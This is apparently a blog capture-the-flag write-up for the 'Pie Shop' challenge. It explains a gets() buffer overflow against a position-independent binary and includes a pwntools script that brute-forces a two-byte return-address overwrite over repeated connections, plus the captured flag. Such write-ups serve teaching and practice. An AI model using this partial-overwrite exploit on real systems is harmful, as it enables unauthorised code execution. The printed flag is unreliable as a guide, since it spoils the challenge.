Pie Shop

Category: Binary
Points: 100
Description: I sure love pies (source)!

The biggest fluke of my LIFE. Okay so this was another simple buffer overflow again using the gets() call.

BUT

PIE (position independent executable) is enabled on this binary which means that the addresses of the functions within the binary change. Kinda like ASLR but inside the binary.

So again using gdb with a cyclic pattern to get the offset to overwrite the stack for the RIP. We find it is 72 bytes.

Now I followed this video I found online, but basically the last two bytes of the flag() function never change. They are always 0x01a9 then the previous 3 bytes are random. So I literally just brute forced this by making a connection checking if I overwrote the correct address and got the flag and if not try again.

Now I tried this locally and it took up to 8000 attempts to get the right address. So making 8000 connections was not going to be fun, but I tried it anyway and got it on the like 130th try! HOW LUCKY!

Now im not sure if pwntools was available on the online shell so it might of made it a lot quicker but anyway, got flag.

Here is my python code:

from pwn import *

#p = process("./pie_shop")
#p = gdb.debug("./pie_shop")
#p = remote("shell.actf.co", 19306)

output = ""
count = 1

junk = "A"*72
flag = "\xa9\x01"
#flag = p64(0x5555555551a9)
payload = junk + flag

while "actf{" not in output:
    p = remote("shell.actf.co", 19306)
    #p = process("./pie_shop")
    print(" attempt #%d" % count)
    count += 1
    p.recvuntil("want?")
    p.sendline(payload)
    output = p.recvall()
    p.close()
print(output)

Don’t hate pls, never am gonna be able to reproduce the exploit!

FLAG:

actf{a_different_kind_of_pie}

Leave a Reply

Your email address will not be published. Required fields are marked *